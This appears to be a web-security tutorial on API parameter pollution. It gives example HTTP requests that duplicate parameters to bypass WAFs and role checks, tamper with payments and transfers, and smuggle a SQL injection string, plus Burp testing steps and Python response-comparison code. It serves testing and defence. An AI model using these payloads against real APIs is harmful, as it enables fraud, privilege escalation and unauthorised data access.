API parameter pollution

What is API Parameter Pollution?

API Parameter Pollution (APP) exploits inconsistencies in how different components of an application stack parse and process duplicate or conflicting parameters. When APIs receive multiple parameters with the same name, different technologies (web servers, frameworks, load balancers) may handle them differently, leading to security bypasses, authentication issues, and business logic flaws.

Vulnerable Scenario Example

Normal API request:

POST /api/transfer HTTP/1.1
Content-Type: application/x-www-form-urlencoded

amount=100&to_account=user123&from_account=admin

Parameter pollution attack:

POST /api/transfer HTTP/1.1
Content-Type: application/x-www-form-urlencoded

amount=100&to_account=user123&amount=999999&to_account=attacker&from_account=admin

Different component handling:

• Web Application Firewall: Sees first parameters → amount=100, to_account=user123 (allowed)

• Backend API: Processes last parameters → amount=999999, to_account=attacker (executed)

Attack Result: WAF allows the request based on legitimate-looking first parameters, but the backend processes the malicious duplicate parameters, transferring $999,999 to the attacker's account.

Parameter Processing Differences

Technology-Specific Handling

PHP (takes last value):

// URL: /api/endpoint?user=john&role=user&user=admin&role=admin
// $_GET['user'] = "admin" (last value)
// $_GET['role'] = "admin" (last value)

ASP.NET (takes first value):

// URL: /api/endpoint?user=john&role=user&user=admin&role=admin
// Request.QueryString["user"] = "john" (first value)
// Request.QueryString["role"] = "user" (first value)

Node.js/Express (varies by parser):

// Default: last value
// req.query.user = "admin"

// With array handling:
// req.query.user = ["john", "admin"]

Python/Flask (takes first value):

# request.args.get('user') = "john" (first value)
# request.args.getlist('user') = ["john", "admin"] (all values)

API Parameter Pollution Attack Techniques

Authentication and Authorization Bypass

Role-Based Access Control Bypass:

POST /api/admin/users HTTP/1.1
Content-Type: application/x-www-form-urlencoded

action=view&role=user&action=delete&role=admin&user_id=123

Multi-Parameter Authentication:

POST /api/secure/action HTTP/1.1
Content-Type: application/json

{
  "user": "regular_user",
  "permission": "read",
  "user": "admin",
  "permission": "write",
  "action": "delete_all"
}

Token-Based Bypass:

GET /api/profile HTTP/1.1
Authorization: Bearer invalid_token
X-Auth-Token: invalid_token
Authorization: Bearer valid_admin_token
X-Auth-Token: valid_admin_token

Business Logic Manipulation

E-commerce Price Manipulation:

POST /api/cart/checkout HTTP/1.1
Content-Type: application/x-www-form-urlencoded

item_id=123&price=999.99&quantity=1&item_id=123&price=0.01&quantity=1

Payment Amount Tampering:

POST /api/payment/process HTTP/1.1
Content-Type: application/json

{
  "amount": 1000.00,
  "currency": "USD",
  "amount": 1.00,
  "currency": "USD",
  "account": "target_account"
}

Discount Code Stacking:

POST /api/orders/apply-discount HTTP/1.1
Content-Type: application/x-www-form-urlencoded

discount_code=SAVE10&discount_code=SAVE20&discount_code=SAVE50&order_id=12345

Input Validation Bypass

WAF/Security Filter Evasion:

POST /api/search HTTP/1.1
Content-Type: application/x-www-form-urlencoded

query=safe_search_term&query=' OR '1'='1' --

Content Security Policy Bypass:

GET /api/config HTTP/1.1
Origin: https://trusted.com
Origin: https://evil.com

Rate Limiting Bypass:

POST /api/login HTTP/1.1
Content-Type: application/x-www-form-urlencoded

username=user1&password=pass1&username=user2&password=pass2

Testing Methodology

Manual Parameter Pollution Testing

Using Burp Suite:

1. Capture API request in Burp Proxy
2. Send to Repeater
3. Duplicate parameters with different values:
   - Right-click parameter → Add parameter
   - Change values to test different scenarios
4. Monitor response differences
5. Test with different content-types

Example modifications:
- Original: user=john&role=user
- Modified: user=john&role=user&user=admin&role=admin

Postman Testing:

1. Create request with baseline parameters
2. Add duplicate parameters in different locations:
   - Query parameters: ?param=value1&param=value2
   - Form data: param=value1&param=value2
   - JSON body: {"param": "value1", "param": "value2"}
3. Test different HTTP methods
4. Compare responses for anomalies

Burp Suite Automated Testing

Intruder Configuration:

1. Capture baseline request
2. Send to Intruder
3. Set attack type: Cluster bomb
4. Mark parameter positions:
   - Position 1: original parameter value
   - Position 2: duplicate parameter value
5. Load payloads:
   - Payload set 1: legitimate values
   - Payload set 2: malicious values (admin, true, 999999)
6. Start attack and analyze response differences

Advanced Parameter Pollution Techniques

Content-Type Confusion

Mixed Content-Type Pollution:

POST /api/update HTTP/1.1
Content-Type: application/json
Content-Type: application/x-www-form-urlencoded

{"role": "user", "admin": false}
role=admin&admin=true

Multipart Pollution:

POST /api/upload HTTP/1.1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary

------WebKitFormBoundary
Content-Disposition: form-data; name="role"

user
------WebKitFormBoundary
Content-Disposition: form-data; name="role"

admin
------WebKitFormBoundary--

Framework-Specific Exploits

Laravel Parameter Pollution:

POST /api/user/update HTTP/1.1
Content-Type: application/x-www-form-urlencoded

user[role]=user&user[admin]=false&user[role]=admin&user[admin]=true

Spring Boot Pollution:

POST /api/users HTTP/1.1
Content-Type: application/x-www-form-urlencoded

user.role=user&user.permissions=read&user.role=admin&user.permissions=admin

Express.js Array Pollution:

POST /api/permissions HTTP/1.1
Content-Type: application/x-www-form-urlencoded

permissions[]=read&permissions[]=write&permissions[]=admin

Logic Bomb Parameter Pollution

Time-Based Pollution:

POST /api/schedule HTTP/1.1
Content-Type: application/json

{
  "execute_at": "2024-12-31T23:59:59Z",
  "action": "backup",
  "execute_at": "2024-01-01T00:00:01Z",
  "action": "delete_all"
}

Conditional Parameter Pollution:

GET /api/data HTTP/1.1
Cookie: debug=false; admin=false; debug=true; admin=true

Business Logic Attack Scenarios

Financial Transaction Manipulation

Banking API Exploitation:

POST /api/transfer HTTP/1.1
Content-Type: application/x-www-form-urlencoded

from_account=12345&to_account=67890&amount=100.00&to_account=attacker_account&amount=999999.00

Cryptocurrency Exchange:

POST /api/trade HTTP/1.1
Content-Type: application/json

{
  "symbol": "BTC",
  "quantity": 0.001,
  "side": "sell",
  "quantity": 100,
  "side": "buy"
}

Access Control Bypass

Multi-Tenant Application:

GET /api/tenant/data HTTP/1.1
X-Tenant-ID: tenant_123
X-User-Role: user
X-Tenant-ID: admin_tenant
X-User-Role: admin

Resource Permission Bypass:

POST /api/documents/share HTTP/1.1
Content-Type: application/json

{
  "document_id": "doc123",
  "permission": "read",
  "user": "user@company.com",
  "permission": "admin",
  "user": "attacker@evil.com"
}

Detection and Analysis

Response Analysis Patterns

Status Code Changes:

def analyze_pollution_response(original_response, polluted_response):
    indicators = []
    
    # Status code differences
    if original_response.status_code != polluted_response.status_code:
        indicators.append(f"Status changed: {original_response.status_code} -> {polluted_response.status_code}")
    
    # Response length differences
    original_length = len(original_response.text)
    polluted_length = len(polluted_response.text)
    
    if abs(original_length - polluted_length) > 10:  # Significant difference
        indicators.append(f"Response length changed: {original_length} -> {polluted_length}")
    
    # Look for success/error message changes
    success_keywords = ['success', 'updated', 'created', 'deleted']
    error_keywords = ['error', 'failed', 'invalid', 'forbidden']
    
    original_text = original_response.text.lower()
    polluted_text = polluted_response.text.lower()
    
    for keyword in success_keywords + error_keywords:
        if (keyword in original_text) != (keyword in polluted_text):
            indicators.append(f"Response content changed: {keyword} presence differs")
    
    return indicators

Timing Analysis

Time-Based Detection:

import time

def test_timing_pollution(url, params):
    # Baseline timing
    start_time = time.time()
    original_response = requests.get(url, params=params)
    original_time = time.time() - start_time
    
    # Polluted timing
    polluted_params = []
    for key, value in params.items():
        polluted_params.append(f"{key}={value}")
        polluted_params.append(f"{key}=admin")  # Duplicate with different value
    
    polluted_url = f"{url}?{'&'.join(polluted_params)}"
    
    start_time = time.time()
    polluted_response = requests.get(polluted_url)
    polluted_time = time.time() - start_time
    
    # Analyze timing difference
    time_diff = abs(polluted_time - original_time)
    if time_diff > 1.0:  # 1 second threshold
        print(f"Significant timing difference: {time_diff:.2f}s")
        return True
    
    return False

Testing Checklist

Parameter Pollution Test Cases

Basic Tests:

• Duplicate query parameters with different values

• Duplicate form body parameters

• Duplicate JSON keys (where parser allows)

• Duplicate HTTP headers

• Mixed content-type parameter pollution

Authentication/Authorization Tests:

• Role parameter pollution (user → admin)

• Permission parameter pollution

• User ID parameter pollution

• Token/session parameter pollution

Business Logic Tests:

• Price/amount parameter pollution

• Quantity parameter pollution

• Account/destination parameter pollution

• Action/operation parameter pollution

Input Validation Tests:

• SQL injection payload pollution

• XSS payload pollution

• Path traversal payload pollution

• Command injection payload pollution

Framework-Specific Tests:

• Array parameter pollution

• Object property pollution

• Nested parameter pollution

• URL encoding variation pollution